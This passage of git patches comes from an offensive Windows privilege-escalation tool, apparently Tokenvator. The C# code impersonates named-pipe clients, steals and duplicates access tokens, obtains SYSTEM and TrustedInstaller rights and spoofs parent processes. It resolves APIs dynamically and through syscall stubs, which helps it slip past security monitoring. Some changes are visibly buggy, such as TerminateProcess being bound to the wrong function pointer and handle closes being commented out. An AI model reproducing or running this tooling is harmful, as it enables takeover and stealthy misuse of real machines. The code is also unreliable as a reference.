+                        retVal = fImpersonateNamedPipeClient(namedPipe.SafePipeHandle.DangerousGetHandle());
+                    }
+                    catch (Exception ex)
+                    {
+                        Console.WriteLine("[-] ImpersonateNamedPipeClient Generated an Exception");
+                        Console.WriteLine("[-] {0}", ex.Message);
+                        return false;
+                            
                     }
-                }
-                
-                
-                if (!kernel32.OpenThreadToken(kernel32.GetCurrentThread(), Winnt.TOKEN_ALL_ACCESS, false, ref hToken))
-                {
-                    Misc.GetWin32Error("OpenThreadToken");
-                    return false;
-                }
-                Console.WriteLine("[+] Thread Token 0x{0}", hToken.ToString("X4"));
 
-                
-                IntPtr phNewToken = new IntPtr();
-                uint result = ntdll.NtDuplicateToken(hToken, Winnt.TOKEN_ALL_ACCESS, IntPtr.Zero, true, Winnt._TOKEN_TYPE.TokenPrimary, ref phNewToken);
-                if (IntPtr.Zero == phNewToken)
-                {
-                    result = ntdll.NtDuplicateToken(hToken, Winnt.TOKEN_ALL_ACCESS, IntPtr.Zero, true, Winnt._TOKEN_TYPE.TokenImpersonation, ref phNewToken);
-                    if (IntPtr.Zero == phNewToken)
+                    if (!retVal)
                     {
-                        Misc.GetNtError("NtDuplicateToken", result);
+                        Misc.GetWin32Error("ImpersonateNamedPipeClient");
                         return false;
                     }
+                        
+
+                    Console.WriteLine("[+] Impersonated Pipe {0}", pipeName);
                 }
+            }
 
 
-                if (IntPtr.Zero != phNewToken)
-                {
-                    hToken = phNewToken;
-                }
+            IntPtr hkernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
+            IntPtr hGetCurrentThreadId = Generic.GetExportAddress(hkernel32, "GetCurrentThreadId");
+            MonkeyWorks.kernel32.GetCurrentThreadId fGetCurrentThreadId = (MonkeyWorks.kernel32.GetCurrentThreadId)Marshal.GetDelegateForFunctionPointer(hGetCurrentThreadId, typeof(MonkeyWorks.kernel32.GetCurrentThreadId));
+
+            uint threadId = 0;
+            try
+            {
+                threadId = fGetCurrentThreadId();                       
             }
             catch (Exception ex)
             {
+                Console.WriteLine("[-] GetCurrentThreadId Generated an Exception");
                 Console.WriteLine("[-] {0}", ex.Message);
                 return false;
             }
-            finally
+
+            if (!accessTokens.OpenThreadToken(threadId, Winnt.TOKEN_ALL_ACCESS))
             {
-                waitHandle.Set();   
+                return false;
             }
+
+            accessTokens.SetWorkingTokenToThreadToken();
+
             return true;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// 
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         internal static void EnumeratePipes()
         {
@@ -224,5 +266,15 @@ internal static void EnumeratePipes()
                 Console.WriteLine(pipe);
             }
         }
+
+        ~NamedPipes()
+        {
+
+        }
+
+        public void Dispose()
+        {
+            accessTokens.Dispose();
+        }
     }
 }
diff --git a/Tokenvator/Resources/Misc.cs b/Tokenvator/Resources/Misc.cs
index 25f87f7..117680d 100644
--- a/Tokenvator/Resources/Misc.cs
+++ b/Tokenvator/Resources/Misc.cs
@@ -3,12 +3,15 @@
 using System.IO;
 using System.Linq;
 using System.Management;
-using MonkeyWorks.Unmanaged.Libraries;
+using System.Runtime.InteropServices;
+using DInvoke.DynamicInvoke;
 
 using Tokenvator.Plugins.Execution;
 
 namespace Tokenvator.Resources
 {
+    using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
     static class Misc
     {
         ////////////////////////////////////////////////////////////////////////////////
@@ -71,7 +74,24 @@ internal static string GenerateUuid(int length)
         ////////////////////////////////////////////////////////////////////////////////
         public static void GetLsaNtError(string location, uint ntError)
         {
-            uint win32Error = advapi32.LsaNtStatusToWinError(ntError);
+            ////////////////////////////////////////////////////////////////////////////////
+            // uint win32Error = advapi32.LsaNtStatusToWinError(ntError);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hLsaNtStatusToWinError = Generic.GetExportAddress(hadvapi32, "LsaNtStatusToWinError");
+            MonkeyWorks.advapi32.LsaNtStatusToWinError fLsaNtStatusToWinError = (MonkeyWorks.advapi32.LsaNtStatusToWinError)Marshal.GetDelegateForFunctionPointer(hLsaNtStatusToWinError, typeof(MonkeyWorks.advapi32.LsaNtStatusToWinError));
+
+            uint win32Error = 0;
+            try
+            {
+                win32Error = fLsaNtStatusToWinError(ntError);
+            }
+            catch (Exception ex)
+            {
+                GetExceptionMessage(ex, "LsaNtStatusToWinError");
+                return;
+            }
+
             Console.WriteLine(" [-] Function {0} failed: ", location);
             Console.WriteLine(" [-] {0}", new System.ComponentModel.Win32Exception((int)win32Error).Message);
         }
@@ -87,7 +107,7 @@ public static void GetNetApiError(string location, uint netError)
             else
             {
                 Console.WriteLine(" [-] Function {0} failed: ", location);
-                Console.WriteLine(" [-] {0}", (MonkeyWorks.Unmanaged.Libraries.DInvoke.netapi32.NET_API_STATUS)netError);
+                Console.WriteLine(" [-] {0}", (MonkeyWorks.netapi32.NET_API_STATUS)netError);
             }
         }
 
@@ -95,7 +115,25 @@ public static void GetNetApiError(string location, uint netError)
         ////////////////////////////////////////////////////////////////////////////////
         public static void GetNtError(string location, uint ntError)
         {
-            uint win32Error = ntdll.RtlNtStatusToDosError(ntError);
+            ////////////////////////////////////////////////////////////////////////////////
+            // uint win32Error = advapi32.LsaNtStatusToWinError(ntError);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hntdll = Generic.GetPebLdrModuleEntry("ntdll.dll");
+            IntPtr hRtlNtStatusToDosError = Generic.GetExportAddress(hntdll, "RtlNtStatusToDosError");
+            MonkeyWorks.ntdll.RtlNtStatusToDosError fRtlNtStatusToDosError = (MonkeyWorks.ntdll.RtlNtStatusToDosError)Marshal.GetDelegateForFunctionPointer(hRtlNtStatusToDosError, typeof(MonkeyWorks.ntdll.RtlNtStatusToDosError));
+
+
+            uint win32Error;
+            try
+            {
+                win32Error = fRtlNtStatusToDosError(ntError);
+            }
+            catch (Exception ex)
+            {
+                GetExceptionMessage(ex, "RtlNtStatusToDosError");
+                return;
+            }
+
             Console.WriteLine(" [-] Function {0} failed: ", location);
             Console.WriteLine(" [-] {0} (0x{1})", new System.ComponentModel.Win32Exception((int)win32Error).Message, ntError.ToString("X4"));
         }
@@ -107,6 +145,13 @@ public static void GetWin32Error(string location)
             Console.WriteLine(" [-] Function {0} failed: ", location);
             Console.WriteLine(" [-] {0}", new System.ComponentModel.Win32Exception(System.Runtime.InteropServices.Marshal.GetLastWin32Error()).Message);
         }
+
+        public static void GetExceptionMessage(Exception ex, string location)
+        {
+            Console.WriteLine("[-] {0} Generated an Exception", location);
+            Console.WriteLine("[-] {0}", ex.Message);
+        }
+
         #endregion
 
         ////////////////////////////////////////////////////////////////////////////////
diff --git a/Tokenvator/Tokenvator.csproj b/Tokenvator/Tokenvator.csproj
index 758a7dd..30b6e3c 100644
--- a/Tokenvator/Tokenvator.csproj
+++ b/Tokenvator/Tokenvator.csproj
@@ -204,18 +204,6 @@
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\DInvoke\vaultcli.cs" />
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\DInvoke\wlanapi.cs" />
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\DInvoke\wtsapi32.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\advapi32.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\crypt32.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\dbghelp.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\fltlib.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\kernel32.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\netapi32.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\ntdll.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\secur32.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\user32.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\vaultcli.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\wlanapi.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\wtsapi32.cs" />
     <Compile Include="Resources\TabComplete.cs" />
   </ItemGroup>
   <ItemGroup>

From 0e9558b092fb0b5612d1b1191d3c12b7aa172124 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Thu, 7 Apr 2022 08:49:53 -0500
Subject: [PATCH 23/36] Fixed CreateProcessWithLogonW and Add PPID Spoofing

---
 .editorconfig                                 |   3 +
 Tokenvator/MainLoop.Extentions.cs             |  41 +++
 Tokenvator/MainLoop.Modules.cs                | 285 ++++++++++------
 Tokenvator/MainLoop.cs                        |  49 ++-
 .../Plugins/AccessTokens/AccessTokens.cs      | 319 +++++++++++-------
 .../Plugins/AccessTokens/CreateTokens.cs      |  40 ++-
 .../Plugins/AccessTokens/TokenInformation.cs  |  51 +--
 .../Plugins/Enumeration/UserSessions.cs       |  23 +-
 Tokenvator/Plugins/Execution/CreateProcess.cs | 135 ++++++--
 Tokenvator/Plugins/NamedPipes/NamedPipes.cs   |   3 +
 Tokenvator/Resources/CommandLineParsing.cs    |  26 +-
 Tokenvator/Tokenvator.csproj                  |   1 +
 12 files changed, 651 insertions(+), 325 deletions(-)
 create mode 100644 Tokenvator/MainLoop.Extentions.cs

diff --git a/.editorconfig b/.editorconfig
index abb819f..e8a2617 100644
--- a/.editorconfig
+++ b/.editorconfig
@@ -2,3 +2,6 @@
 
 # IDE1006: Naming Styles
 dotnet_diagnostic.IDE1006.severity = none
+
+# CS0414: The field 'NamedPipes.tokenType' is assigned but its value is never used
+dotnet_diagnostic.CS0414.severity = none
diff --git a/Tokenvator/MainLoop.Extentions.cs b/Tokenvator/MainLoop.Extentions.cs
new file mode 100644
index 0000000..2f340ed
--- /dev/null
+++ b/Tokenvator/MainLoop.Extentions.cs
@@ -0,0 +1,41 @@
+using System.Diagnostics;
+
+namespace Tokenvator
+{
+    /// <summary>
+    /// Taken from stack overflow (probably)
+    /// Forgot to record the link
+    /// </summary>
+    public static class ProcessExtensions
+    {
+        private static string FindIndexedProcessName(int pid)
+        {
+            var processName = Process.GetProcessById(pid).ProcessName;
+            var processesByName = Process.GetProcessesByName(processName);
+            string processIndexdName = null;
+
+            for (var index = 0; index < processesByName.Length; index++)
+            {
+                processIndexdName = index == 0 ? processName : processName + "#" + index;
+                var processId = new PerformanceCounter("Process", "ID Process", processIndexdName);
+                if ((int)processId.NextValue() == pid)
+                {
+                    return processIndexdName;
+                }
+            }
+
+            return processIndexdName;
+        }
+
+        private static Process FindPidFromIndexedProcessName(string indexedProcessName)
+        {
+            var parentId = new PerformanceCounter("Process", "Creating Process ID", indexedProcessName);
+            return Process.GetProcessById((int)parentId.NextValue());
+        }
+
+        public static Process Parent(this Process process)
+        {
+            return FindPidFromIndexedProcessName(FindIndexedProcessName(process.Id));
+        }
+    }
+}
diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index 1d2c923..094b9c7 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
@@ -1,10 +1,13 @@
 using System;
 using System.Collections.Generic;
-using System.Collections.ObjectModel;
 using System.Diagnostics;
+using System.IO;
 using System.Linq;
 using System.Management.Automation;
 using System.Management.Automation.Runspaces;
+using System.Runtime.ExceptionServices;
+using System.Runtime.InteropServices;
+using System.Security;
 using System.Security.Principal;
 using System.Threading;
 
@@ -18,15 +21,10 @@
 using Tokenvator.Plugins.NamedPipes;
 
 using MonkeyWorks.Unmanaged.Headers;
-//using MonkeyWorks.Unmanaged.Libraries;
-
-using System.IO;
-using System.Runtime.InteropServices;
-using System.Runtime.ExceptionServices;
-using System.Security;
 
 namespace Tokenvator
 {
+    //Using a different using statment to track the changes from P/Invoke to D/Invoke
     using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
 
     partial class MainLoop
@@ -71,6 +69,7 @@ private void _AddPrivilege()
         /// <summary>
         /// Enables, Disables, or Removes a privilege from a Token
         /// No Conversion Required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _AlterPrivilege(Winnt.TokenPrivileges attribute)
@@ -103,6 +102,7 @@ private void _AlterPrivilege(Winnt.TokenPrivileges attribute)
         /// <summary>
         /// Sets the ACL for a desktop and window stations to everyone
         /// No Conversion Required
+        /// 
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _ClearDesktopACL()
@@ -119,6 +119,7 @@ private void _ClearDesktopACL()
         /// <summary>
         /// Clones all the attributes of an existing token and creates a new one
         /// No Conversion Required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _CloneToken()
@@ -127,7 +128,6 @@ private void _CloneToken()
             {
                 using (CreateTokens ct = new CreateTokens(currentProcessToken))
                 {
-                    ct.SetWorkingTokenToSelf();
                     ct.CloneToken(cLP.ProcessID, cLP.Command);
                 }
             }
@@ -144,10 +144,11 @@ private void _CloneToken()
         /// https://github.com/bb107/WinSudo/blob/b2cb7700bd2f7ee59e2ef7f9ca20c2a671ce72a8/PrivilegeHelps/Security.cpp
         /// https://www.exploit-db.com/papers/42556
         /// No Conversion Required
+        /// 
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _CreateToken()
-        {   
+        {
             try
             {
                 using (CreateTokens ct = new CreateTokens(currentProcessToken))
@@ -263,6 +264,7 @@ private void _FilterUnload()
         /// <summary>
         /// Use Native APIs to find processes that a user is running 
         /// No Conversion Required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _FindUserProcesses()
@@ -286,6 +288,7 @@ private void _FindUserProcesses()
         /// <summary>
         /// Use WMI to find processes that a user is running 
         /// No Conversion Required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _FindUserProcessesWMI()
@@ -309,6 +312,7 @@ private void _FindUserProcessesWMI()
         /// <summary>
         /// Impersonates a SYSTEM token or creates a new process with the duplicated token
         /// No Conversion Required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _GetSystem()
@@ -349,6 +353,7 @@ private void _GetSystem()
         /// <summary>
         /// Delegates out to _GetTrustedInstallerLogon and _GetTrustedInstallerService
         /// No Conversion Required
+        /// QA OK
         /// </summary>
         /// <param name="cLP"></param>
         /// <param name="currentProcessToken"></param>
@@ -369,6 +374,8 @@ private void _GetTrustedInstaller()
         /// <summary>
         /// Calls LogonUserExExW with NT SERVICE\TrustedInstaller listed as a group
         /// No Conversion Required
+        /// Need to get SYSTEM first
+        /// QA OK
         /// </summary>
         /// <param name="cLP"></param>
         /// <param name="currentProcessToken"></param>
@@ -378,12 +385,12 @@ private void _GetTrustedInstallerLogon()
             using (CreateTokens ct = new CreateTokens())
             {
                 ct.LogonUser(
-                    "NT AUTHORITY", 
-                    "SYSTEM", 
-                    string.Empty, 
+                    "NT AUTHORITY",
+                    "SYSTEM",
+                    string.Empty,
                     "NT SERVICE\\TrustedInstaller",
-                     Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE, 
-                     cLP.Command, 
+                     Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE,
+                     cLP.Command,
                      cLP.Arguments
                 );
             }
@@ -393,6 +400,7 @@ private void _GetTrustedInstallerLogon()
         /// <summary>
         /// Starts Windows Module Installer and impersonates or starts a process with 
         /// No Conversion Required
+        /// QA OK
         /// </summary>
         /// <param name="cLP"></param>
         /// <param name="currentProcessToken"></param>
@@ -423,8 +431,9 @@ private void _GetTrustedInstallerService()
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// Help Menue Wrapper
+        /// Help Menu Wrapper
         /// No Conversion Required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private static void _Help(string input)
@@ -440,6 +449,7 @@ private static void _Help(string input)
         /// <summary>
         /// Displays various token information
         /// No Conversion Required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _Info()
@@ -463,7 +473,7 @@ private void _Info()
 
                 Console.WriteLine("[*] Primary Token");
                 t.GetTokenUser();
-                
+
                 Console.WriteLine();
 
                 Console.WriteLine("[*] Impersonation Tokens");
@@ -485,16 +495,16 @@ private void _Info()
                 {
                     t.GetTokenSource();
                     Console.WriteLine();
-                    
+
                     t.GetTokenPrivileges();
                     Console.WriteLine();
-                    
+
                     t.GetTokenOwner();
                     Console.WriteLine();
-                    
+
                     t.GetTokenPrimaryGroup();
                     Console.WriteLine();
-                    
+
                     t.GetTokenDefaultDacl();
                     Console.WriteLine();
 
@@ -602,6 +612,7 @@ private void _InstallDriver()
         /// <summary>
         /// Module to check if a process is marked as critical
         /// Converted to a mix of D/Invoke Syscalls and GetPebLdrModuleEntry/GetExportAddress
+        /// QA OK
         /// </summary>
         /// <param name="cLP"></param>
         /// <param name="hProcess"></param>
@@ -610,7 +621,7 @@ private void _InstallDriver()
         [HandleProcessCorruptedStateExceptions]
         private void _IsCriticalProcess()
         {
-            IntPtr hProcess = new IntPtr();
+            IntPtr hProcess = new IntPtr(-1);
 
             if (cLP.Remote)
             {
@@ -618,7 +629,7 @@ private void _IsCriticalProcess()
                 // kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_INFORMATION, false, (uint)cLP.ProcessID);
                 ////////////////////////////////////////////////////////////////////////////////
                 IntPtr hNtOpenProcess = Generic.GetSyscallStub("NtOpenProcess");
-                MonkeyWorks.ntdll.NtOpenProcess fSyscallNtOpenProcess = (MonkeyWorks.ntdll.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtOpenProcess));
+                var fSyscallNtOpenProcess = (MonkeyWorks.ntdll.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtOpenProcess));
 
                 MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
                 MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID
@@ -629,12 +640,11 @@ private void _IsCriticalProcess()
                 uint ntRetVal = 0;
                 try
                 {
-                    ntRetVal = fSyscallNtOpenProcess(ref hProcess, ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_INFORMATION, ref objectAttributes, ref clientId);
+                    ntRetVal = fSyscallNtOpenProcess(ref hProcess, ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_LIMITED_INFORMATION, ref objectAttributes, ref clientId);
                 }
                 catch (Exception ex)
                 {
-                    Console.WriteLine("[-] NtOpenProcess Generated an Exception");
-                    Console.WriteLine("[-] {0}", ex.Message);
+                    Misc.GetExceptionMessage(ex, "NtOpenProcess");
                     return;
                 }
 
@@ -645,34 +655,51 @@ private void _IsCriticalProcess()
                 }
             }
 
+            Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
+
             ////////////////////////////////////////////////////////////////////////////////
             // kernel32.IsProcessCritical(hProcess, ref bIsCritical)
             ////////////////////////////////////////////////////////////////////////////////
             IntPtr hKernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
-            IntPtr hIsProcessCritical = Generic.GetExportAddress(hKernel32, "IsProcessCritical");
-            MonkeyWorks.kernel32.IsProcessCritical fIsProcessCritical = (MonkeyWorks.kernel32.IsProcessCritical)Marshal.GetDelegateForFunctionPointer(hIsProcessCritical, typeof(MonkeyWorks.kernel32.IsProcessCritical));
+            IntPtr hGetProcAddress = Generic.GetExportAddress(hKernel32, "GetProcAddress");
+            var fGetProcAddress = (MonkeyWorks.kernel32.GetProcAddress)Marshal.GetDelegateForFunctionPointer(hGetProcAddress, typeof(MonkeyWorks.kernel32.GetProcAddress));
 
-            bool bIsCritical = false;
+            IntPtr hIsProcessCritical = IntPtr.Zero;
+            try
+            {
+                hIsProcessCritical = fGetProcAddress(hKernel32, "IsProcessCritical");
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] IsProcessCritical Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+
+            }
+
+            //IntPtr hIsProcessCritical = Generic.GetExportAddress(hKernel32, "IsProcessCritical");
+            var fIsProcessCritical = (MonkeyWorks.kernel32.IsProcessCritical)Marshal.GetDelegateForFunctionPointer(hIsProcessCritical, typeof(MonkeyWorks.kernel32.IsProcessCritical));
+
+            bool bCritical = true;
             bool retVal = false;
             try
             {
-                retVal = fIsProcessCritical(hProcess, ref bIsCritical);
+                retVal = fIsProcessCritical(hProcess, ref bCritical);
             }
             catch (Exception ex)
             {
-                Console.WriteLine("[-] NtOpenProcess Generated an Exception");
+                Console.WriteLine("[-] IsProcessCritical Generated an Exception");
                 Console.WriteLine("[-] {0}", ex.Message);
-                return;
+
             }
-            
+
             if (!retVal)
             {
                 Misc.GetWin32Error("IsProcessCritical");
-                AccessTokens.CloseHandle(hProcess);
+                //AccessTokens.CloseHandle(hProcess);
                 return;
             }
-            Console.WriteLine("[*] Process Critical State: {0}", bIsCritical);
-            AccessTokens.CloseHandle(hProcess);
+            Console.WriteLine("[*] Process Critical State: {0}", bCritical);
+            //AccessTokens.CloseHandle(hProcess);
             return;
         }
 
@@ -680,6 +707,7 @@ private void _IsCriticalProcess()
         /// <summary>
         /// List the loaded minifilters
         /// No conversions required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _ListFilters()
@@ -707,6 +735,7 @@ private void _ListFilters()
         /// <summary>
         /// List the instances / volumes attached to for a given minifilter
         /// No conversions required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _ListFiltersInstances()
@@ -741,6 +770,7 @@ private void _ListFiltersInstances()
         /// <summary>
         /// List the privileges for a token
         /// No conversions required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _ListPrivileges()
@@ -778,6 +808,7 @@ private void _ListPrivileges()
         /// <summary>
         /// Logs on a user, can be used with virtual service accounts
         /// No conversions required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _LogonUser()
@@ -857,6 +888,7 @@ private void _LogonUser()
         /// <summary>
         /// Disable and remove all the privileges on a given token
         /// No conversions required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _NukePrivileges()
@@ -908,6 +940,7 @@ private void _NukePrivileges()
         /// <summary>
         /// Reverts to self
         /// No conversions required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _RevertToSelf()
@@ -922,6 +955,7 @@ private void _RevertToSelf()
         /// <summary>
         /// Finds all logged on users
         /// No conversions required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _SampleProcess()
@@ -939,6 +973,7 @@ private void _SampleProcess()
         /// <summary>
         /// Finds all logged on users via WMI
         /// No conversions required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _SampleProcessWMI()
@@ -956,6 +991,7 @@ private void _SampleProcessWMI()
         /// <summary>
         /// Marks or unmarks a process as being critical
         /// Converted to D/Invoke Syscalls
+        /// QA OK
         /// </summary>
         /// <param name="cLP"></param>
         /// <param name="hProcess"></param>
@@ -1031,7 +1067,7 @@ private void _SetCriticalProcess()
             if (0 != ntRetVal)
             {
                 Misc.GetNtError("NtSetInformationProcess", ntRetVal);
-                AccessTokens.CloseHandle(hProcess);
+                //AccessTokens.CloseHandle(hProcess);
                 return;
             }
 
@@ -1044,7 +1080,7 @@ private void _SetCriticalProcess()
                 Console.WriteLine("[+] Process {0} is Unmarked as Critical", cLP.ProcessID);
             }
 
-            AccessTokens.CloseHandle(hProcess);
+            //AccessTokens.CloseHandle(hProcess);
             return;
         }
 
@@ -1080,6 +1116,7 @@ private void _StartDriver()
         /// Duplicates a token from another process - either impersonates or creates a 
         /// new process
         /// No conversions required
+        /// QA OK
         /// </summary>
         /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
@@ -1087,7 +1124,7 @@ private bool _StealToken()
         {
             using (TokenManipulation t = new TokenManipulation(currentProcessToken))
             {
-                
+
                 if (string.IsNullOrWhiteSpace(cLP.Command))
                 {
                     if (0 != cLP.ProcessID && t.OpenProcessToken(cLP.ProcessID))
@@ -1130,12 +1167,41 @@ private bool _StealToken()
                         return false;
                     }
 
-                    if (t.StartProcessAsUser(cLP.Command))
+                    uint previousPid = 0;
+                    uint discard;
+
+                    if (0 != cLP.PPID)
                     {
-                        return true;
+                        if(!CreateProcess.SpoofParentProcess(cLP.PPID, out previousPid))
+                        {
+                            return false;
+                        }
+                    }
+
+                    if (!t.StartProcessAsUser(cLP.Command))
+                    {
+                        if (0 != cLP.PPID)
+                        {
+                            // restore state
+                            
+                            if (!CreateProcess.SpoofParentProcess(previousPid, out discard))
+                            {
+                                //My head really hurts, figure out later
+                            }
+                        }
+
+                        return false;
+                    }
+
+                    if (!CreateProcess.SpoofParentProcess(previousPid, out discard))
+                    {
+                        //My head really hurts, figure out later
                     }
+
+
+                    Console.WriteLine("\n[*] If a new windows doesn't appear, it may be nessessary to run Clear_Desktop_Acl");
                 }
-                return false;
+                return true;
             }
         }
 
@@ -1143,6 +1209,7 @@ private bool _StealToken()
         /// <summary>
         /// Steal a token from a named pipe, has some wierd corner cases
         /// No conversions required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _StealPipeToken()
@@ -1232,6 +1299,7 @@ private void _SubProcessStdOut()
         /// <summary>
         /// Terminates a given process
         /// Converted to D/Invoke Syscalls
+        /// Not Terminating?
         /// </summary>
         /// <param name="cLP"></param>
         /// <param name="hProcess"></param>
@@ -1244,7 +1312,7 @@ private void _Terminate()
             // kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_SET_INFORMATION, false, (uint)cLP.ProcessID);
             ////////////////////////////////////////////////////////////////////////////////
             IntPtr hNtOpenProcess = Generic.GetSyscallStub("NtOpenProcess");
-            MonkeyWorks.ntdll.NtOpenProcess fSyscallNtOpenProcess = (MonkeyWorks.ntdll.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtOpenProcess));
+            var fSyscallNtOpenProcess = (MonkeyWorks.ntdll.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtOpenProcess));
 
             MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
             MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID
@@ -1274,29 +1342,32 @@ private void _Terminate()
 
             ////////////////////////////////////////////////////////////////////////////////
             // kernel32.TerminateProcess(hProcess, 0)
+            // IntPtr hNtTerminateProcess = Generic.GetSyscallStub("NtTerminateProcess");
+            // var fSyscallNtTerminateProcess = (MonkeyWorks.ntdll.NtTerminateProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtTerminateProcess));
             ////////////////////////////////////////////////////////////////////////////////
-            IntPtr hNtTerminateProcess = Generic.GetSyscallStub("NtTerminateProcess");
-            MonkeyWorks.ntdll.NtTerminateProcess fSyscallNtTerminateProcess = (MonkeyWorks.ntdll.NtTerminateProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtTerminateProcess));
 
-            ntRetVal = 0;
+            IntPtr hkernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
+            IntPtr hTerminateProcess = Generic.GetExportAddress(hkernel32, "TerminateProcess");
+            var fTerminateProcess = (MonkeyWorks.kernel32.TerminateProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.kernel32.TerminateProcess));
+
+            bool retVal = false;
             try
             {
-                ntRetVal = fSyscallNtTerminateProcess(hProcess, 0);
+                retVal = fTerminateProcess(hProcess, 0);
             }
             catch (Exception ex)
             {
-                Console.WriteLine("[-] NtTerminateProcess Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
+                Misc.GetExceptionMessage(ex, "TerminateProcess");
                 return;
             }
             finally
             {
-                AccessTokens.CloseHandle(hProcess);
+                //AccessTokens.CloseHandle(hProcess);
             }
 
-            if (0 != ntRetVal)
+            if (!retVal)
             {
-                Misc.GetNtError("NtTerminateProcess", ntRetVal);
+                Misc.GetNtError("TerminateProcess", ntRetVal);
                 return;
             }
 
@@ -1365,6 +1436,7 @@ private void _UnInstallDriver()
         /// <summary>
         /// Runs a cmd prompt command
         /// No conversions required
+        /// QA OK
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private void _Run()
@@ -1397,6 +1469,7 @@ private void _Run()
         /// <summary>
         /// Emulates the functionality for runas /netonly
         /// Migrated to Move this to CreateTokens & CreateProcess
+        /// QA OK
